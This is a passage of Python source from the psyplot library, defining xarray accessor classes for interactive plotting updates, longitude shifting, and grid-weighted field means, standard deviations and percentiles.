@docstrings.get_sections(base='InteractiveBase.start_update',
sections=['Parameters', 'Returns'])
@dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`no_auto_update` attribute of this instance and the `auto_update`
parameter in the :meth:`update` method has been set to False
Parameters
----------
draw: bool or None
Boolean to control whether the figure of this array shall be drawn
at the end. If None, it defaults to the `'auto_draw'`` parameter
in the :attr:`psyplot.rcParams` dictionary
queues: list of :class:`Queue.Queue` instances
The queues that are passed to the
:meth:`psyplot.plotter.Plotter.start_update` method to ensure a
thread-safe update. It can be None if only one single plotter is
updated at the same time. The number of jobs that are taken from
the queue is determined by the :meth:`_njobs` attribute. Note that
there this parameter is automatically configured when updating
from a :class:`~psyplot.project.Project`.
Returns
-------
bool
A boolean indicating whether a redrawing is necessary or not
See Also
--------
:attr:`no_auto_update`, update
"""
if self.plotter is not None:
return self.plotter.start_update(draw=draw, queues=queues)
docstrings.keep_params('InteractiveBase.start_update.parameters', 'draw')
@docstrings.get_sections(base='InteractiveBase.update',
sections=['Parameters', 'Notes'])
@docstrings.dedent
def update(self, fmt={}, replot=False, draw=None, auto_update=False,
force=False, todefault=False, **kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveBase._register_update.parameters)s
auto_update: bool
Boolean determining whether or not the :meth:`start_update` method
is called at the end. This parameter has no effect if the
:attr:`no_auto_update` attribute is set to ``True``.
%(InteractiveBase.start_update.parameters.draw)s
``**kwargs``
Any other formatoption that shall be updated (additionally to those
in `fmt`)
Notes
-----
If the :attr:`no_auto_update` attribute is True and the given
`auto_update` parameter are is False, the update of the plots are
registered and conducted at the next call of the :meth:`start_update`
method or the next call of this method (if the `auto_update` parameter
is then True).
"""
fmt = dict(fmt)
fmt.update(kwargs)
self._register_update(replot=replot, fmt=fmt, force=force,
todefault=todefault)
if not self.no_auto_update or auto_update:
self.start_update(draw=draw)
def to_interactive_list(self):
"""Return a :class:`InteractiveList` that contains this object"""
raise NotImplementedError('Not implemented for the %s class' % (
self.__class__.__name__, ))
@xr.register_dataarray_accessor('psy')
class InteractiveArray(InteractiveBase):
"""Interactive psyplot accessor for the data array
This class keeps reference to the base :class:`xarray.Dataset` where the
:class:`array.DataArray` originates from and enables to switch between the
coordinates in the array. Furthermore it has a :attr:`plotter` attribute to
enable interactive plotting via an :class:`psyplot.plotter.Plotter`
instance."""
@property
def base(self):
"""Base dataset this instance gets its data from"""
if self._base is None:
if 'variable' in self.arr.dims:
def to_dataset(i):
ret = self.isel(variable=i).to_dataset(
name=self.arr.coords['variable'].values[i])
try:
return ret.drop_vars('variable')
except ValueError: # 'variable' Variable not defined
pass
return ret
ds = to_dataset(0)
if len(self.arr.coords['variable']) > 1:
for i in range(1, len(self.arr.coords['variable'])):
ds.update(ds.merge(to_dataset(i)))
self._base = ds
else:
self._base = self.arr.to_dataset(
name=self.arr.name or self.arr_name)
self.onbasechange.emit()
return self._base
@base.setter
def base(self, value):
self._base = value
self.onbasechange.emit()
@property
def decoder(self):
"""The decoder of this array"""
try:
return self._decoder
except AttributeError:
self._decoder = CFDecoder.get_decoder(self.base, self.arr)
return self._decoder
@decoder.setter
def decoder(self, value):
self._decoder = value
@property
def idims(self):
"""Coordinates in the :attr:`base` dataset as int or slice
This attribute holds a mapping from the coordinate names of this
array to an integer, slice or an array of integer that represent the
coordinates in the :attr:`base` dataset"""
if self._idims is None:
self._idims = self.decoder.get_idims(self.arr)
return self._idims
@idims.setter
def idims(self, value):
self._idims = value
@property
@docstrings
def _njobs(self):
"""%(InteractiveBase._njobs)s"""
ret = super(self.__class__, self)._njobs or [0]
ret[0] += 1
return ret
logger = InteractiveBase.logger
_idims = None
_base = None
# -------------- SIGNALS --------------------------------------------------
#: :class:`Signal` to be emiited when the base of the object changes
onbasechange = Signal('_onbasechange')
_onbasechange = None
@docstrings.dedent
def __init__(self, xarray_obj, *args, **kwargs):
"""
The ``*args`` and ``**kwargs`` are essentially the same as for the
:class:`xarray.DataArray` method, additional ``**kwargs`` are
described below.
Other Parameters
----------------
base: xarray.Dataset
Default: None. Dataset that serves as the origin of the data
contained in this DataArray instance. This will be used if you want
to update the coordinates via the :meth:`update` method. If None,
this instance will serve as a base as soon as it is needed.
decoder: psyplot.CFDecoder
The decoder that decodes the `base` dataset and is used to get
bounds. If not given, a new :class:`CFDecoder` is created
idims: dict
Default: None. dictionary with integer values and/or slices in the
`base` dictionary. If not given, they are determined automatically
%(InteractiveBase.parameters)s
"""
self.arr = xarray_obj
super(InteractiveArray, self).__init__(*args, **kwargs)
self._registered_updates = {}
self._new_dims = {}
self.method = None
def init_accessor(self, base=None, idims=None, decoder=None,
*args, **kwargs):
"""
Initialize the accessor instance
This method initializes the accessor
Parameters
----------
base: xr.Dataset
The base dataset for the data
idims: dict
A mapping from dimension name to indices. If not provided, it is
calculated when the :attr:`idims` attribute is accessed
decoder: CFDecoder
The decoder of this object
%(InteractiveBase.parameters)s
"""
if base is not None:
self.base = base
self.idims = idims
if decoder is not None:
self.decoder = decoder
super(InteractiveArray, self).__init__(*args, **kwargs)
@property
def iter_base_variables(self):
"""An iterator over the base variables in the :attr:`base` dataset"""
if VARIABLELABEL in self.arr.coords:
return (self._get_base_var(name) for name in safe_list(
self.arr.coords[VARIABLELABEL].values.tolist()))
name = self.arr.name
if name is None:
return iter([self.arr._variable])
return iter([self.base.variables[name]])
def _get_base_var(self, name):
try:
return self.base.variables[name]
except KeyError:
return self.arr.sel(**{VARIABLELABEL: name}).rename(name)
@property
def base_variables(self):
"""A mapping from the variable name to the variablein the :attr:`base`
dataset."""
if VARIABLELABEL in self.arr.coords:
return OrderedDict([
(name, self._get_base_var(name)) for name in safe_list(
self.arr.coords[VARIABLELABEL].values.tolist())])
name = self.arr.name
if name is None:
return {name: self.arr._variable}
else:
return {self.arr.name: self.base.variables[self.arr.name]}
docstrings.keep_params('setup_coords.parameters', 'dims')
@docstrings.get_sections(base='InteractiveArray._register_update')
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating
Parameters
----------
method: {'isel', None, 'nearest', ...}
Selection method of the xarray.Dataset to be used for setting the
variables from the informations in `dims`.
If `method` is 'isel', the :meth:`xarray.Dataset.isel` method is
used. Otherwise it sets the `method` parameter for the
:meth:`xarray.Dataset.sel` method.
%(setup_coords.parameters.dims)s
%(InteractiveBase._register_update.parameters)s
See Also
--------
start_update"""
if self._new_dims and self.method != method:
raise ValueError(
"New dimensions were already specified for with the %s method!"
" I can not choose a new method %s" % (self.method, method))
else:
self.method = method
if 'name' in dims:
self._new_dims['name'] = dims.pop('name')
if 'name' in self._new_dims:
name = self._new_dims['name']
if not isstring(name):
name = name[0] # concatenated array
arr = self.base[name]
else:
arr= next(six.itervalues(self.base_variables))
self._new_dims.update(self.decoder.correct_dims(arr, dims))
InteractiveBase._register_update(
self, fmt=fmt, replot=replot or bool(self._new_dims), force=force,
todefault=todefault)
def _update_concatenated(self, dims, method):
"""Updates a concatenated array to new dimensions"""
def is_unequal(v1, v2):
try:
return bool(v1 != v2)
except ValueError: # arrays
try:
(v1 == v2).all()
except AttributeError:
return False
def filter_attrs(item):
"""Checks whether the attribute is from the base variable"""
return (item[0] not in self.base.attrs or
is_unequal(item[1], self.base.attrs[item[0]]))
saved_attrs = list(filter(filter_attrs, six.iteritems(self.arr.attrs)))
saved_name = self.arr.name
self.arr.name = 'None'
if 'name' in dims:
name = dims.pop('name')
else:
name = list(self.arr.coords['variable'].values)
if method == 'isel':
self.idims.update(dims)
dims = self.idims
for dim in set(self.base[name].dims) - set(dims):
dims[dim] = slice(None)
for dim in set(dims) - set(self.base[name].dims):
del dims[dim]
res = self.base[name].isel(**dims).to_array()
else:
self._idims = None
for key, val in six.iteritems(self.arr.coords):
if key != 'variable':
dims.setdefault(key, val)
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
res = self.base[name].sel(**kws)
except KeyError:
_fix_times(kws)
res = self.base[name].sel(**kws)
res = res.to_array()
if 'coordinates' in self.base[name[0]].encoding:
res.encoding['coordinates'] = self.base[name[0]].encoding[
'coordinates']
self.arr._variable = res._variable
self.arr._coords = res._coords
try:
self.arr._indexes = (
res._indexes.copy() if res._indexes is not None else None)
except AttributeError: # res.indexes not existent for xr<0.12
pass
self.arr.name = saved_name
for key, val in saved_attrs:
self.arr.attrs[key] = val
def _update_array(self, dims, method):
"""Updates the array to the new dims from then :attr:`base` dataset"""
def is_unequal(v1, v2):
try:
return bool(v1 != v2)
except ValueError: # arrays
try:
(v1 == v2).all()
except AttributeError:
return False
def filter_attrs(item):
"""Checks whether the attribute is from the base variable"""
return (item[0] not in base_var.attrs or
is_unequal(item[1], base_var.attrs[item[0]]))
base_var = self.base.variables[self.arr.name]
if 'name' in dims:
name = dims.pop('name')
self.arr.name = name
else:
name = self.arr.name
# save attributes that have been changed by the user
saved_attrs = list(filter(filter_attrs, six.iteritems(self.arr.attrs)))
if method == 'isel':
self.idims.update(dims)
dims = self.idims
for dim in set(self.base[name].dims) - set(dims):
dims[dim] = slice(None)
for dim in set(dims) - set(self.base[name].dims):
del dims[dim]
res = self.base[name].isel(**dims)
else:
self._idims = None
old_dims = self.arr.dims[:]
for key, val in six.iteritems(self.arr.coords):
dims.setdefault(key, val)
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
res = self.base[name].sel(**kws)
except KeyError:
_fix_times(kws)
res = self.base[name].sel(**kws)
# squeeze the 0-dimensional dimensions
res = res.isel(**{
dim: 0 for i, dim in enumerate(res.dims) if (
res.shape[i] == 1 and dim not in old_dims)})
self.arr._variable = res._variable
self.arr._coords = res._coords
try:
self.arr._indexes = (
res._indexes.copy() if res._indexes is not None else None)
except AttributeError: # res.indexes not existent for xr<0.12
pass
# update to old attributes
for key, val in saved_attrs:
self.arr.attrs[key] = val
def shiftlon(self, central_longitude):
"""
Shift longitudes and the data so that they match map projection region.
Only valid for cylindrical/pseudo-cylindrical global projections and
data on regular lat/lon grids. longitudes need to be 1D.
Parameters
----------
central_longitude
center of map projection region
References
----------
This function is copied and taken from the
:class:`mpl_toolkits.basemap.Basemap` class. The only difference is
that we do not mask values outside the map projection region
"""
if xr_version < (0, 10):
raise NotImplementedError(
"xarray>=0.10 is required for the shiftlon method!")
arr = self.arr
ret = arr.copy(True, arr.values.copy())
if arr.ndim > 2:
xname = self.get_dim('x')
yname = self.get_dim('y')
shapes = OrderedDict(
[(dim, range(i)) for dim, i in zip(arr.dims, arr.shape)
if dim not in [xname, yname]])
dims = list(shapes)
for indexes in product(*shapes.values()):
d = dict(zip(dims, indexes))
shifted = ret[d].psy.shiftlon(central_longitude)
ret[d] = shifted.values
x = shifted.psy.get_coord('x')
ret[x.name] = shifted[x.name].variable
return ret
lon = self.get_coord('x').variable
xname = self.get_dim('x')
ix = arr.dims.index(xname)
lon = lon.copy(True, lon.values.copy())
lonsin = lon.values
datain = arr.values.copy()
clon = np.asarray(central_longitude)
if lonsin.ndim not in [1]:
raise ValueError('1D longitudes required')
elif clon.ndim:
raise ValueError("Central longitude must be a scalar, not "
"%i-dimensional!" % clon.ndim)
lonsin = np.where(lonsin > clon+180, lonsin-360, lonsin)
lonsin = np.where(lonsin < clon-180, lonsin+360, lonsin)
londiff = np.abs(lonsin[0:-1]-lonsin[1:])
londiff_sort = np.sort(londiff)
thresh = 360.-londiff_sort[-2]
itemindex = len(lonsin) - np.where(londiff >= thresh)[0]
if itemindex.size:
# check to see if cyclic (wraparound) point included
# if so, remove it.
if np.abs(lonsin[0]-lonsin[-1]) < 1.e-4:
hascyclic = True
lonsin_save = lonsin.copy()
lonsin = lonsin[1:]
if datain is not None:
datain_save = datain.copy()
datain = datain[1:]
else:
hascyclic = False
lonsin = np.roll(lonsin, itemindex-1)
if datain is not None:
datain = np.roll(datain, itemindex-1, [ix])
# add cyclic point back at beginning.
if hascyclic:
lonsin_save[1:] = lonsin
lonsin_save[0] = lonsin[-1]-360.
lonsin = lonsin_save
if datain is not None:
datain_save[1:] = datain
datain_save[0] = datain[-1]
datain = datain_save
ret = ret.copy(True, datain)
lon.values[:] = lonsin
ret[lon.name] = lon
return ret
@docstrings.dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`no_auto_update` attribute of this instance is True and the
`auto_update` parameter in the :meth:`update` method has been set to
False
Parameters
----------
%(InteractiveBase.start_update.parameters)s
Returns
-------
%(InteractiveBase.start_update.returns)s
See Also
--------
:attr:`no_auto_update`, update
"""
def filter_attrs(item):
return (item[0] not in self.base.attrs or
item[1] != self.base.attrs[item[0]])
if queues is not None:
# make sure that no plot is updated during gathering the data
queues[0].get()
try:
dims = self._new_dims
method = self.method
if dims:
if VARIABLELABEL in self.arr.coords:
self._update_concatenated(dims, method)
else:
self._update_array(dims, method)
if queues is not None:
queues[0].task_done()
self._new_dims = {}
self.onupdate.emit()
except Exception:
self._finish_all(queues)
raise
return InteractiveBase.start_update(self, draw=draw, queues=queues)
@docstrings.get_sections(base='InteractiveArray.update',
sections=['Parameters', 'Notes'])
@docstrings.dedent
def update(self, method='isel', dims={}, fmt={}, replot=False,
auto_update=False, draw=None, force=False, todefault=False,
**kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveArray._register_update.parameters)s
auto_update: bool
Boolean determining whether or not the :meth:`start_update` method
is called after the end.
%(InteractiveBase.start_update.parameters)s
``**kwargs``
Any other formatoption or dimension that shall be updated
(additionally to those in `fmt` and `dims`)
Notes
-----
When updating to a new array while trying to set the dimensions at the
same time, you have to specify the new dimensions via the `dims`
parameter, e.g.::
da.psy.update(name='new_name', dims={'new_dim': 3})
if ``'new_dim'`` is not yet a dimension of this array
%(InteractiveBase.update.notes)s"""
dims = dict(dims)
fmt = dict(fmt)
vars_and_coords = set(chain(
self.arr.dims, self.arr.coords, ['name', 'x', 'y', 'z', 't']))
furtherdims, furtherfmt = utils.sort_kwargs(kwargs, vars_and_coords)
dims.update(furtherdims)
fmt.update(furtherfmt)
self._register_update(method=method, replot=replot, dims=dims,
fmt=fmt, force=force, todefault=todefault)
if not self.no_auto_update or auto_update:
self.start_update(draw=draw)
def _short_info(self, intend=0, maybe=False):
str_intend = ' ' * intend
if 'variable' in self.arr.coords:
name = ', '.join(self.arr.coords['variable'].values)
else:
name = self.arr.name
if self.arr.ndim > 0:
dims = ', with (%s)=%s' % (', '.join(self.arr.dims),
self.arr.shape)
else:
dims = ''
return str_intend + "%s: %i-dim %s of %s%s, %s" % (
self.arr_name, self.arr.ndim, self.arr.__class__.__name__, name,
dims, ", ".join(
"%s=%s" % (coord, format_item(val.values))
for coord, val in six.iteritems(self.arr.coords)
if val.ndim == 0))
def __getitem__(self, key):
ret = self.arr.__getitem__(key)
ret.psy._base = self.base
return ret
def isel(self, *args, **kwargs):
# reimplemented to keep the base. The doc is set below
ret = self.arr.isel(*args, **kwargs)
ret.psy._base = self._base
return ret
def sel(self, *args, **kwargs):
# reimplemented to keep the base. The doc is set below
ret = self.arr.sel(*args, **kwargs)
ret.psy._base = self._base
return ret
def copy(self, deep=False):
"""Copy the array
This method returns a copy of the underlying array in the :attr:`arr`
attribute. It is more stable because it creates a new `psy` accessor"""
arr = self.arr.copy(deep)
try:
arr.psy = InteractiveArray(arr)
except AttributeError: # attribute is read-only for xarray >=0.13
pass
return arr
def to_interactive_list(self):
return InteractiveList([self], arr_name=self.arr_name)
@docstrings.get_sections(base='InteractiveArray.get_coord')
@docstrings.dedent
def get_coord(self, what, base=False):
"""
The x-coordinate of this data array
Parameters
----------
what: {'t', 'x', 'y', 'z'}
The letter of the axis
base: bool
If True, use the base variable in the :attr:`base` dataset."""
what = what.lower()
return getattr(self.decoder, 'get_' + what)(
next(six.itervalues(self.base_variables)) if base else self.arr,
self.arr.coords)
@docstrings.dedent
def get_dim(self, what, base=False):
"""
The name of the x-dimension of this data array
Parameters
----------
%(InteractiveArray.get_coord.parameters)s"""
what = what.lower()
return getattr(self.decoder, 'get_%sname' % what)(
next(six.itervalues(self.base_variables)) if base else self.arr)
# ------------------ Calculations -----------------------------------------
def _gridweights(self):
"""Calculate the gridweights with a simple rectangular approximation"""
arr = self.arr
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
# convert the units
xcoord_orig = xcoord
ycoord_orig = ycoord
units = xcoord.attrs.get('units', '')
in_metres = False
in_degree = False
if 'deg' in units or (
'rad' not in units and 'lon' in xcoord.name and
'lat' in ycoord.name):
xcoord = xcoord * np.pi / 180
ycoord = ycoord * np.pi / 180
in_degree = True
elif 'rad' in units:
pass
else:
in_metres = True
# calculate the gridcell boundaries
xbounds = self.decoder.get_plotbounds(xcoord, arr.coords)
ybounds = self.decoder.get_plotbounds(ycoord, arr.coords)
if xbounds.ndim == 1:
xbounds, ybounds = np.meshgrid(xbounds, ybounds)
# calculate the weights based on the units
if xcoord.ndim == 2 or self.decoder.is_unstructured(self.arr):
warn("[%s] - Curvilinear grids are not supported! "
"Using constant grid cell area weights!" % self.logger.name,
PsyPlotRuntimeWarning)
weights = np.ones_like(xcoord.values)
elif in_metres:
weights = np.abs(xbounds[:-1, :-1] - xbounds[1:, 1:]) * (
np.abs(ybounds[:-1, :-1] - ybounds[1:, 1:]))
else:
weights = np.abs(xbounds[:-1, :-1] - xbounds[1:, 1:]) * (
np.sin(ybounds[:-1, :-1]) - np.sin(ybounds[1:, 1:]))
# normalize the weights by dividing through the sum
if in_degree:
xmask = (xcoord_orig.values < -400) | (xcoord_orig.values > 400)
ymask = (ycoord_orig.values < -200) | (ycoord_orig.values > 200)
if xmask.any() or ymask.any():
if xmask.ndim == 1 and weights.ndim != 1:
xmask, ymask = np.meshgrid(xmask, ymask)
weights[xmask | ymask] = np.nan
if np.any(~np.isnan(weights)):
weights /= np.nansum(weights)
return weights
def _gridweights_cdo(self):
"""Estimate the gridweights using CDOs"""
from cdo import Cdo
from tempfile import NamedTemporaryFile
sdims = {self.get_dim('y'), self.get_dim('x')}
cdo = Cdo()
fname = NamedTemporaryFile(prefix='psy', suffix='.nc').name
arr = self.arr
base = arr.psy.base
dims = arr.dims
ds = arr.isel(**{d: 0 for d in set(dims) - sdims}).to_dataset()
for coord in six.itervalues(ds.coords):
bounds = coord.attrs.get('bounds', coord.encoding.get('bounds'))
if (bounds and bounds in set(base.coords) - set(ds.coords) and
sdims.intersection(base.coords[bounds].dims)):
ds[bounds] = base.sel(
**{d: arr.coords[d].values for d in sdims}
).coords[bounds]
ds = ds.drop_vars([c.name for c in six.itervalues(ds.coords)
if not c.ndim])
to_netcdf(ds, fname)
ret = cdo.gridweights(input=fname, returnArray='cell_weights')
try:
os.remove(fname)
except Exception:
pass
return ret
def _weights_to_da(self, weights, keepdims=False, keepshape=False):
"""Convert the 2D weights into a DataArray and potentially enlarge it
"""
arr = self.arr
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
sdims = (self.get_dim('y'), self.get_dim('x'))
if sdims[0] == sdims[1]: # unstructured grids
sdims = sdims[:1]
if (ycoord.name, xcoord.name) != sdims:
attrs = dict(coordinates=ycoord.name + ' ' + xcoord.name)
else:
attrs = {}
# reshape and expand if necessary
if not keepdims and not keepshape:
coords = {ycoord.name: ycoord, xcoord.name: xcoord}
dims = sdims
elif keepshape:
if with_dask:
from dask.array import broadcast_to, notnull
else:
from numpy import broadcast_to, isnan
def notnull(a):
return ~isnan(a)
dims = arr.dims
coords = arr.coords
weights = broadcast_to(weights / weights.sum(), arr.shape)
# set nans to zero weigths. This step takes quite a lot of time for
# large arrays since it involves a copy of the entire `arr`
weights *= notnull(arr)
# normalize the weights
weights /= weights.sum(axis=tuple(map(dims.index, sdims)),
keepdims=True)
else:
dims = arr.dims
coords = arr.isel(
**{d: 0 if d not in sdims else slice(None)
for d in dims}).coords
weights = weights.reshape(
tuple(1 if dim not in sdims else s
for s, dim in zip(arr.shape, arr.dims)))
return xr.DataArray(weights, dims=dims, coords=coords,
name='cell_weights', attrs=attrs)
def gridweights(self, keepdims=False, keepshape=False, use_cdo=None):
"""Calculate the cell weights for each grid cell
Parameters
----------
keepdims: bool
If True, keep the number of dimensions
keepshape: bool
If True, keep the exact shape as the source array and the missing
values in the array are masked
use_cdo: bool or None
If True, use Climate Data Operators (CDOs) to calculate the
weights. Note that this is used automatically for unstructured
grids. If None, it depends on the ``'gridweights.use_cdo'``
item in the :attr:`psyplot.rcParams`.
Returns
-------
xarray.DataArray
The 2D-DataArray with the grid weights"""
if use_cdo is None:
use_cdo = rcParams['gridweights.use_cdo']
if not use_cdo and self.decoder.is_unstructured(self.arr):
use_cdo = True
if use_cdo is None or use_cdo:
try:
weights = self._gridweights_cdo()
except Exception:
if use_cdo:
raise
else:
weights = self._gridweights()
else:
weights = self._gridweights()
return self._weights_to_da(weights, keepdims=keepdims,
keepshape=keepshape)
def _fldaverage_args(self):
"""Masked array, xname, yname and axis for calculating the average"""
arr = self.arr
sdims = (self.get_dim('y'), self.get_dim('x'))
if sdims[0] == sdims[1]:
sdims = sdims[:1]
axis = tuple(map(arr.dims.index, sdims))
return arr, sdims, axis
def _insert_fldmean_bounds(self, da, keepdims=False):
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
sdims = (self.get_dim('y'), self.get_dim('x'))
xbounds = np.array([[xcoord.min(), xcoord.max()]])
ybounds = np.array([[ycoord.min(), ycoord.max()]])
xdims = (sdims[-1], 'bnds') if keepdims else ('bnds', )
ydims = (sdims[0], 'bnds') if keepdims else ('bnds', )
xattrs = xcoord.attrs.copy()
xattrs.pop('bounds', None)
yattrs = ycoord.attrs.copy()
yattrs.pop('bounds', None)
da.psy.base.coords[xcoord.name + '_bnds'] = xr.Variable(
xdims, xbounds if keepdims else xbounds[0], attrs=xattrs)
da.psy.base.coords[ycoord.name + '_bnds'] = xr.Variable(
ydims, ybounds if keepdims else ybounds[0], attrs=yattrs)
def fldmean(self, keepdims=False):
"""Calculate the weighted mean over the x- and y-dimension
This method calculates the weighted mean of the spatial dimensions.
Weights are calculated using the :meth:`gridweights` method, missing
values are ignored. x- and y-dimensions are identified using the
:attr:`decoder`s :meth:`~CFDecoder.get_xname` and
:meth:`~CFDecoder.get_yname` methods.
Parameters
----------
keepdims: bool
If True, the dimensionality of this array is maintained
Returns
-------
xr.DataArray
The computed fldmeans. The dimensions are the same as in this
array, only the spatial dimensions are omitted if `keepdims` is
False.
See Also
--------
fldstd: For calculating the weighted standard deviation
fldpctl: For calculating weighted percentiles
"""
gridweights = self.gridweights()
arr, sdims, axis = self._fldaverage_args()
xcoord = self.decoder.get_x(next(six.itervalues(self.base_variables)),
arr.coords)
ycoord = self.decoder.get_y(next(six.itervalues(self.base_variables)),
arr.coords)
means = ((arr * gridweights)).sum(axis=axis) * (
gridweights.size / arr.notnull().sum(axis=axis))
if keepdims:
means = means.expand_dims(sdims, axis=axis)
if keepdims:
means[xcoord.name] = xcoord.mean().expand_dims(xcoord.dims[0])
means[ycoord.name] = ycoord.mean().expand_dims(ycoord.dims[0])
else:
means[xcoord.name] = xcoord.mean()
means[ycoord.name] = ycoord.mean()
means.coords[xcoord.name].attrs['bounds'] = xcoord.name + '_bnds'
means.coords[ycoord.name].attrs['bounds'] = ycoord.name + '_bnds'
self._insert_fldmean_bounds(means, keepdims)
means.name = arr.name
return means
def fldstd(self, keepdims=False):
"""Calculate the weighted standard deviation over x- and y-dimension
This method calculates the weighted standard deviation of the spatial
dimensions. Weights are calculated using the :meth:`gridweights`
method, missing values are ignored. x- and y-dimensions are identified
using the :attr:`decoder`s :meth:`~CFDecoder.get_xname` and
:meth:`~CFDecoder.get_yname` methods.
Parameters
----------
keepdims: bool
If True, the dimensionality of this array is maintained
Returns
-------
xr.DataArray
The computed standard deviations. The dimensions are the same as
in this array, only the spatial dimensions are omitted if
`keepdims` is False.
See Also
--------
fldmean: For calculating the weighted mean
fldpctl: For calculating weighted percentiles
"""
arr, sdims, axis = self._fldaverage_args()
means = self.fldmean(keepdims=True)
weights = self.gridweights(keepshape=True)
variance = ((arr - means.values)**2 * weights).sum(axis=axis)
if keepdims:
variance = variance.expand_dims(sdims, axis=axis)
for key, coord in six.iteritems(means.coords):
if key not in variance.coords:
dims = set(sdims).intersection(coord.dims)
variance[key] = coord if keepdims else coord.isel(
**dict(zip(dims, repeat(0))))
for key, coord in six.iteritems(means.psy.base.coords):
if key not in variance.psy.base.coords:
dims = set(sdims).intersection(coord.dims)
variance.psy.base[key] = coord if keepdims else coord.isel(
**dict(zip(dims, repeat(0))))
std = variance**0.5
std.name = arr.name
return std
def fldpctl(self, q, keepdims=False):
"""Calculate the percentiles along the x- and y-dimensions
This method calculates the specified percentiles along the given
dimension. Percentiles are weighted by the :meth:`gridweights` method
and missing values are ignored. x- and y-dimensions are estimated
through the :attr:`decoder`s :meth:`~CFDecoder.get_xname` and
:meth:`~CFDecoder.get_yname` methods
Parameters
----------
q: float or list of floats between 0 and 100
The quantiles to estimate
keepdims: bool
If True, the number of dimensions of the array are maintained
Returns
-------
xr.DataArray
The data array with the dimensions. If `q` is a list or `keepdims`
is True, the first dimension will be the percentile ``'pctl'``.
The other dimensions are the same as in this array, only the
spatial dimensions are omitted if `keepdims` is False.
See Also
--------
fldstd: For calculating the weighted standard deviation
fldmean: For calculating the weighted mean
Warnings
--------
This method does load the entire array into memory! So take care if you
handle big data."""
gridweights = self.gridweights(keepshape=True)
arr = self.arr
q = np.asarray(q) / 100.
if not (np.all(q >= 0) and np.all(q <= 100)):
raise ValueError('q should be in [0, 100]')
reduce_shape = False if keepdims else (not bool(q.ndim))
if not q.ndim:
q = q[np.newaxis]
data = arr.values.copy()
sdims, axis = self._fldaverage_args()[1:]
weights = gridweights.values
# flatten along the spatial axis
for ax in axis:
data = np.rollaxis(data, ax, 0)
weights = np.rollaxis(weights, ax, 0)
data = data.reshape(
(np.product(data.shape[:len(axis)]), ) + data.shape[len(axis):])
weights = weights.reshape(
(np.product(weights.shape[:len(axis)]), ) +
weights.shape[len(axis):])
# sort the data
sorter = np.argsort(data, axis=0)
all_indices = map(tuple, product(*map(range, data.shape[1:])))
for indices in all_indices:
indices = (slice(None), ) + indices
data.__setitem__(
indices, data.__getitem__(indices)[
sorter.__getitem__(indices)])
weights.__setitem__(
indices, weights.__getitem__(indices)[
sorter.__getitem__(indices)])
# compute the percentiles
try:
weights = np.nancumsum(weights, axis=0) - 0.5 * weights
except AttributeError:
notnull = ~np.isnan(weights)
weights[notnull] = np.cumsum(weights[notnull])
all_indices = map(tuple, product(*map(range, data.shape[1:])))
pctl = np.zeros((len(q), ) + data.shape[1:])
for indices in all_indices:
indices = (slice(None), ) + indices
mask = ~np.isnan(data.__getitem__(indices))
pctl.__setitem__(indices, np.interp(
q, weights.__getitem__(indices)[mask],
data.__getitem__(indices)[mask]))
# setup the data array and it's coordinates
xcoord = self.decoder.get_x(next(six.itervalues(self.base_variables)),
arr.coords)
ycoord = self.decoder.get_y(next(six.itervalues(self.base_variables)),
arr.coords)
coords = dict(arr.coords)
if keepdims:
pctl = pctl.reshape(
(len(q), ) +
tuple(1 if i in axis else s for i, s in enumerate(arr.shape)))
coords[xcoord.name] = xcoord.mean().expand_dims(xcoord.dims[0])
coords[ycoord.name] = ycoord.mean().expand_dims(ycoord.dims[0])
dims = arr.dims
else:
coords[xcoord.name] = xcoord.mean()
coords[ycoord.name] = ycoord.mean()
dims = tuple(d for d in arr.dims if d not in sdims)
if reduce_shape:
pctl = pctl[0]
coords['pctl'] = xr.Variable((), q[0] * 100.,
attrs={'long_name': 'Percentile'})
else:
coords['pctl'] = xr.Variable(('pctl', ), q * 100.,
attrs={'long_name': 'Percentile'})
dims = ('pctl', ) + dims
coords[xcoord.name].attrs['bounds'] = xcoord.name + '_bnds'
coords[ycoord.name].attrs['bounds'] = ycoord.name + '_bnds'
coords = {name: c for name, c in coords.items()
if set(c.dims) <= set(dims)}
ret = xr.DataArray(pctl, name=arr.name, dims=dims, coords=coords,
attrs=arr.attrs.copy())
self._insert_fldmean_bounds(ret, keepdims)
return ret
isel.__doc__ = xr.DataArray.isel.__doc__
sel.__doc__ = xr.DataArray.sel.__doc__
class ArrayList(list):
"""Base class for creating a list of interactive arrays from a dataset
This list contains and manages :class:`InteractiveArray` instances"""
docstrings.keep_params('InteractiveBase.parameters', 'auto_update')
@property
def dims(self):
"""Dimensions of the arrays in this list"""
return set(chain(*(arr.dims for arr in self)))
@property
def dims_intersect(self):
"""Dimensions of the arrays in this list that are used in all arrays
"""
return set.intersection(*map(
set, (getattr(arr, 'dims_intersect', arr.dims) for arr in self)))
@property
def arr_names(self):
"""Names of the arrays (!not of the variables!) in this list
This attribute can be set with an iterable of unique names to change
the array names of the data objects in this list."""
return list(arr.psy.arr_name for arr in self)
@arr_names.setter
def arr_names(self, value):
value = list(islice(value, 0, len(self)))
if not len(set(value)) == len(self):
raise ValueError(
"Got %i unique array names for %i data objects!" % (
len(set(value)), len(self)))
for arr, n in zip(self, value):
arr.psy.arr_name = n
@property
def names(self):
"""Set of the variable in this list"""
ret = set()
for arr in self:
if isinstance(arr, InteractiveList):
ret.update(arr.names)
else:
ret.add(arr.name)
return ret
@property
def all_names(self):
"""The variable names for each of the arrays in this list"""
return [
_get_variable_names(arr) if not isinstance(arr, ArrayList) else
arr.all_names
for arr in self]
@property
def all_dims(self):
"""The dimensions for each of the arrays in this list"""
return [
